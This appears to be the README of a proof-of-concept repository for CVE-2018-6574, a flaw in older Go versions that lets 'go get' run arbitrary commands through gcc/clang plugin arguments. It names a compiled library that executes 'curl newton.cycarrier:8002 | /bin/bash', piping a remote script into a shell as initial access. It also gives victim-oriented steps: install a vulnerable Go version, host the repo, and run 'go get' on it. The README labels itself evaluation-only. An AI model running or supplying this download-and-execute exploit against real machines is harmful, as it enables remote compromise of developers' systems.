Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow go get
remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin=
and -plugin=
arguments were not blocked. (from mitre)
The command was compiled into the dynamic library calc_darwin.so
. And the current command is curl newton.cycarrier:8002 | /bin/bash
. It was used as an intitial access of a program. You have to host a file server on port 8002 and bind the host to your IP.
At first, you have to install the required version of golang on the victim. Then, host this repo on a accessable git server. Finally, use go get
command to gather this repo, and the command will be executed automatically.
Take my repo as example. You have to use the following command:
go get github.com/frozenkp/CVE-2018-6574
This repo is only for evaluation purpose.